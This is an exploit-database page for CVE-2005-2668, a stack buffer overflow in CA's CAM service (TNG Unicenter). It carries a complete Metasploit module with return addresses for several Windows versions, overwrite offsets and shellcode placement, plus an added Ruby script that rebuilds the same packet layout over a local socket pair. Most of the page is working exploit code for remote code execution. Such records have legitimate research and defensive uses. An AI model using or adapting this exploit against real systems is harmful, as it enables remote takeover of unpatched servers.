CA CAM log_security() Stack Buffer Overflow (Win32) - exploit.company
Vendor: TNG Unicenter
Author: hdm
CVSS: 7.5 (HIGH)
Vulnerability type: Stack Buffer Overflow
CWE: 119
Product Name: TNG Unicenter
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
CVE: CVE-2005-2668
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows
Year: 2005

CA CAM log_security() Stack Buffer Overflow (Win32)

This module exploits a stack buffer overflow in the CA CAM service (part of TNG Unicenter) by passing an over-long parameter to the log_security() function. The service answers a new connection with the bytes "ACK\x00"; the module uses that banner as its check() fingerprint and then sends a 4-byte header followed by a 4096-byte parameter terminated by a NUL. The saved return address sits at offset 1016 of that parameter and ESI points at offset 1052, so each target's Ret is a "return to ESI" address in W2API.DLL or ws2help.dll. The module has been tested on Unicenter v3.1.

Mitigation:

Apply the necessary patch or upgrade to a non-vulnerable version.

Exploit-DB raw data:

##
# $Id: cam_log_security.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'CA CAM log_security() Stack Buffer Overflow (Win32)',
			'Description'    => %q{
					This module exploits a vulnerability in the CA CAM service
				by passing a long parameter to the log_security() function.
				The CAM service is part of TNG Unicenter. This module has
				been tested on Unicenter v3.1.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					['CVE', '2005-2668'],
					['OSVDB', '18916'],
					['BID', '14622'],
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,
				},
			'Targets'        =>
				[
					# W2API.DLL @ 0x01950000 - return to ESI
					['W2API.DLL TNG 2.3',  { 'Platform' => 'win', 'Ret' => 0x01951107 }],

					# Return to ESI in ws2help.dll
					['Windows 2000 SP0-SP4 English', { 'Platform' => 'win', 'Ret' => 0x750217ae }],
					['Windows XP SP0-SP1 English',   { 'Platform' => 'win', 'Ret' => 0x71aa16e5 }],
					['Windows XP SP2 English',       { 'Platform' => 'win', 'Ret' => 0x71aa1b22 }],
					['Windows 2003 SP0 English',     { 'Platform' => 'win', 'Ret' => 0x71bf175f }],
				],
			'DisclosureDate' => 'Aug 22 2005',
			'DefaultTarget' => 0))
	end


	def check
		connect
		ack = sock.get_once
		disconnect

		(ack == "ACK\x00") ? Exploit::CheckCode::Detected : Exploit::CheckCode::Safe
	end

	def exploit
		connect

		ack = sock.get_once
		if (ack != "ACK\x00")
			print_status("The CAM service is not responding")
		end

		buf = rand_text_english(4096, payload_badchars)

		# Offset 1016 for EIP, 1024 = ESP, 1052 = ESI
		buf[ 1016, 4 ] = [target.ret].pack('V')
		buf[ 1052, payload.encoded.length ] = payload.encoded

		sock.put("\xfa\xf9\x00\x10" + buf + "\x00")

		handler
		disconnect
	end

end
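The following is an added example, not part of the Metasploit module above or of CA's code. It reconstructs the wire exchange and the buffer layout the module uses (header, EIP offset 1016, ESI offset 1052, trailing NUL) so the offsets can be checked offline, and plays both sides of the conversation over a local socket pair that stands in for the TCP connection. The "service" side only sends the banner and records what it receives; nothing is exploited. The assumption that the parameter is consumed as a NUL-terminated C string (which is why "\x00" is the module's only bad char) is marked in the code.

```ruby
require 'socket'

# Constants taken from the module above; "assumption" marks what it does not state.
CAM_HEADER  = "\xfa\xf9\x00\x10".b  # 4-byte header sent before the parameter
CAM_ACK     = "ACK\x00".b           # banner the service sends on connect
EIP_OFFSET  = 1016                  # saved return address is overwritten here
ESP_OFFSET  = 1024                  # ESP at the time of the return
ESI_OFFSET  = 1052                  # ESI points here, so Ret is a "return to ESI" gadget
BUF_LEN     = 4096
MAX_PAYLOAD = 1024                  # 'Space' in the module
BAD_CHARS   = "\x00".b              # assumption: the parameter is copied as a C string

# Letters-and-spaces filler, standing in for the framework's rand_text_english.
def filler(len, seed = 1)
  rng = Random.new(seed)
  alphabet = (('A'..'Z').to_a + ('a'..'z').to_a + [' ']).join.b
  Array.new(len) { alphabet[rng.rand(alphabet.bytesize)] }.join.b
end

def contains_badchars?(bytes, badchars = BAD_CHARS)
  !(bytes.b.bytes & badchars.b.bytes).empty?
end

# Builds the exact packet layout the module sends: header + 4096-byte parameter + NUL.
def build_cam_packet(ret, shellcode, seed = 1)
  shellcode = shellcode.b
  ret_bytes = [ret].pack('V')       # little-endian, as the module's pack('V')
  raise ArgumentError, 'payload exceeds Space' if shellcode.bytesize > MAX_PAYLOAD
  raise ArgumentError, 'payload contains a bad char' if contains_badchars?(shellcode)
  raise ArgumentError, 'return address contains a bad char' if contains_badchars?(ret_bytes)
  buf = filler(BUF_LEN, seed)
  buf[EIP_OFFSET, 4] = ret_bytes
  buf[ESI_OFFSET, shellcode.bytesize] = shellcode
  CAM_HEADER + buf + "\x00".b
end

# Reads the layout back out of a packet: what a C-string copy on the service
# side would take, and what lands at the EIP and ESI offsets.
def parse_cam_packet(pkt)
  pkt = pkt.b
  param = pkt[CAM_HEADER.bytesize..-1]
  copied = param[0, param.index("\x00".b) || param.bytesize]
  {
    header:     pkt[0, CAM_HEADER.bytesize],
    copied_len: copied.bytesize,
    ret:        copied[EIP_OFFSET, 4].unpack('V').first,
    esi_bytes:  copied[ESI_OFFSET, MAX_PAYLOAD],
  }
end

# Plays both sides over a UNIX socket pair (stands in for the TCP connection).
# The client side makes the same banner test as the module's check() method.
def run_exchange(ret, shellcode, banner = CAM_ACK)
  svc, cli = UNIXSocket.pair
  expected = CAM_HEADER.bytesize + BUF_LEN + 1
  received = nil
  service = Thread.new do
    svc.write(banner)
    received = svc.read(expected) if banner == CAM_ACK
    svc.close
  end
  ack = cli.read(CAM_ACK.bytesize)
  result = if ack == CAM_ACK
             pkt = build_cam_packet(ret, shellcode)
             cli.write(pkt)
             { detected: true, sent: pkt.bytesize }
           else
             { detected: false, sent: 0 }
           end
  cli.close
  service.join
  result.merge(received: received)
end

if __FILE__ == $PROGRAM_NAME
  r = run_exchange(0x01951107, "\xcc".b * 16)   # Ret for the 'W2API.DLL TNG 2.3' target
  puts "detected=#{r[:detected]} sent=#{r[:sent]} #{parse_cam_packet(r[:received]).inspect}"
end
```

The ret-bytes check matters in practice: every target address in the module (0x01951107, 0x750217ae, 0x71aa16e5, 0x71aa1b22, 0x71bf175f) happens to contain no 0x00 byte, which is what allows the overwritten return address to survive a C-string copy of the parameter.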